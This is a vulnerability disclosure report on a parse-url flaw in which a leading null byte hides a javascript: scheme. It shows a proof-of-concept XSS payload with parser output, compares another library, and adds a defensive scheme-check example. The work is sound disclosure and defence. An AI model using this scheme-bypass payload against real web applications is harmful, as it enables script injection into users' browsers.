Improper Input Validation in ionicabizau/parse-url
Valid
Reported on Feb 24th 2022
Description
If an attacker inserts a null byte at the beginning of the javascript scheme, parse-url will not recognise the javascript scheme and instead reports a different protocol. Therefore, all null bytes must be removed before parsing.
Proof of Concept
```js
const parseUrl = require("parse-url")
const url = parseUrl("\x00javascript:alert(document.domain)") // unreported
console.log(url)
```
Output:
```
{
  protocols: [],
  protocol: 'ssh',
  port: null,
  resource: '\u0000javascript',
  user: '',
  pathname: '/alert(document.domain)',
  hash: '',
  search: '',
  href: '\u0000javascript:alert(document.domain)',
  query: [Object: null prototype] {}
}
```
```js
location.href = '\u0000javascript:alert(document.domain)'
```
This works fine in browsers!
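The following is an added example, not code from parse-url or from the reporter: a small scheme allow-list check that removes null bytes before deciding which scheme a string carries, placed beside the naive check that the report shows being fooled. It goes slightly beyond the report's null byte by also dropping the C0 controls and whitespace that browsers ignore when parsing URLs; `SAFE_SCHEMES` and the function names are assumptions for this example.

```javascript
// Added example (not parse-url's own code). A leading NUL makes a naive
// scheme check read "\x00javascript:..." as a schemeless, relative URL,
// while the browser still executes it as javascript:.
const SAFE_SCHEMES = new Set(["http", "https", "mailto"]); // assumed policy

// Remove NUL bytes (the report's point), plus tab/newline anywhere and
// leading/trailing C0 controls or space, which browsers ignore as well.
function normalizeForSchemeCheck(input) {
  return String(input)
    .replace(/\u0000/g, "")
    .replace(/[\t\n\r]/g, "")
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
}

// Scheme per RFC 3986: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) ":"
function extractScheme(url) {
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Naive check on the raw string: a NUL prefix hides the scheme, so the
// value is treated as relative and allowed.
function naiveIsSafeHref(raw) {
  const scheme = extractScheme(raw);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// Hardened check: normalise first, then allow-list the scheme.
// Schemeless (relative) URLs are still allowed.
function isSafeHref(raw) {
  const scheme = extractScheme(normalizeForSchemeCheck(raw));
  return scheme === null || SAFE_SCHEMES.has(scheme);
}
```

Run against the report's input, `naiveIsSafeHref` returns true and `isSafeHref` returns false; a NUL in the middle of the scheme (`"java\x00script:"`) is rejected the same way.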
References
We are processing your report and will contact the ionicabizau/parse-url team within 24 hours.
5 months ago
```js
const parser = require('url-parse');
console.log(parser("\x00javascript:alert(document.domain)"))
```
Output:
```
{
  slashes: false,
  protocol: 'javascript:',
  hash: '',
  query: '',
  pathname: 'alert(document.domain)',
  auth: '',
  host: '',
  port: '',
  hostname: '',
  password: '',
  username: '',
  origin: 'null',
  href: 'javascript:alert(document.domain)'
}
```
Above is the return value of the unshiftio/url-parse module.
We have sent a fix follow up to the ionicabizau/parse-url team.
We will try again in 7 days.
5 months ago
We have sent a second fix follow up to the ionicabizau/parse-url team.
We will try again in 10 days.
5 months ago
We have sent a third and final fix follow up to the ionicabizau/parse-url team.
This report is now considered stale.
5 months ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty